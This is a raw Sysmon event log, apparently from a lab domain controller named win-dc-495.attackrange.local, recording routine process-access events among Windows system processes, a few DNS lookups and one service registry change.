+51791 10341000x80000000000000009835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.024{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.024{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+396a|c:\windows\system32\SYSNTFY.dll+1fc3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+527f8|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.024{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.024{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.024{59A5CD1D-8E46-6005-1600-00000000A301}15442212C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.946{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 22542200x800000000000000010252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.335{59A5CD1D-8E46-6005-1600-00000000A301}1544fe2.update.microsoft.com0type: 5 fe2.update.microsoft.com.nsatc.net;::ffff:20.188.78.189;::ffff:40.70.224.149;::ffff:52.142.21.139;C:\Windows\System32\svchost.exe 22542200x800000000000000010251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.778{59A5CD1D-8E56-6005-2E00-00000000A301}2464ocsp.comodoca.com0::ffff:151.139.128.14;C:\Windows\sysmon64.exe 13241300x800000000000000010250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1031,T1050SetValue2021-01-18 13:58:17.836{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\EFS\StartDWORD (0x00000003) 10341000x800000000000000010249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+3a1a|c:\windows\system32\SYSNTFY.dll+1e8d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+527f8|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.664{59A5CD1D-8E46-6005-1600-00000000A301}15442408C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\sessenv.dll+3de88|c:\windows\system32\sessenv.dll+f881|c:\windows\system32\sessenv.dll+677c|c:\windows\system32\SYSNTFY.dll+1e8d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+527f8|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.649{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.649{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.602{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.571{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-93F9-6005-F804-00000000A301}2740C:\Windows\system32\ServerManagerLauncher.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.571{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.571{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.571{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.571{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.571{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-93F9-6005-F804-00000000A301}2740C:\Windows\system32\ServerManagerLauncher.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.571{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F804-00000000A301}2740C:\Windows\system32\ServerManagerLauncher.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\UBPM.dll+ac60|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+10806|c:\windows\system32\UBPM.dll+d3a9|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.539{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+6260e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000010233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.539{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+625bd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000010232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.539{59A5CD1D-93F9-6005-F704-00000000A301}22564880C:\Windows\system32\conhost.exe{59A5CD1D-93F9-6005-F404-00000000A301}2964C:\Windows\System32\XblGameSaveTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.524{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 